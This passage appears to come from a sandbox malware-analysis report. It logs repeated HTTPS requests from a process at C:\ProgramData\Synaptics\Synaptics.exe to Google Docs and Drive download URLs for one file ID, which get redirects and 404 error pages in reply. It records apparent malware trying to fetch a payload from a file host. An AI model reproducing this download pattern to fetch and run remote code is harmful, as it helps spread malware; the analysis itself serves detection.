                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-kiZNsJpqhb4U9vtISJ2ouQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:34 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                              2024-12-30 10:48:34 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 72 53 56 74 79 54 56 32 6a 4d 6b 50 4c 55 64 70 59 35 4d 48 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                              Data Ascii: t Found)!!1</title><style nonce="trSVtyTV2jMkPLUdpY5MHw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                              2024-12-30 10:48:34 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              115192.168.2.449962142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:34 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:34 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC6UXG5cuXAFnxQqNg1L-4y-4w2uLm9I7XXGRkF0p2cUPcBi6uagLX7IjXY5bwV5_h9Qtmsv-f0
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:34 GMT
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-bmLz4GIOjPJn-v2j61E3zQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:34 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                              2024-12-30 10:48:34 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 58 5a 52 74 32 6d 66 45 4c 33 50 56 65 72 55 42 38 4d 79 45 53 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="XZRt2mfEL3PVerUB8MyESg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                              2024-12-30 10:48:34 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              116192.168.2.449968142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:34 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:35 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:35 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-2umjbaWr_7ULs4cURywrVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              117192.168.2.449970142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:35 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              118192.168.2.449971142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:35 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              119192.168.2.449973142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:35 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              120192.168.2.449979142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:35 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:36 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:36 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-JDa2MGN_ErqMePMExKWfCA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              121192.168.2.449981142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:35 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:36 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:36 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-X3nxpid68XFM7RRdLcr2yw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              122192.168.2.449980142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:36 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:36 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC62ytW1rXfJuk5LPnNGs8nHThcjxhrE433SIaNPRKtfKz8nabzGjdQS5qZumlLiLIbj
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:36 GMT
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-04YpyNTY6X-88V7VBwqYYA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:36 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                              2024-12-30 10:48:36 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 77 31 30 65 4a 46 70 45 4f 65 55 4a 72 67 4e 7a 59 31 64 32 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                              Data Ascii: t Found)!!1</title><style nonce="aw10eJFpEOeUJrgNzY1d2Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                              2024-12-30 10:48:36 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              123192.168.2.449992142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:36 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:37 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:37 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-2reTzaMapVDmJervLZKgpw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              124192.168.2.449991142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
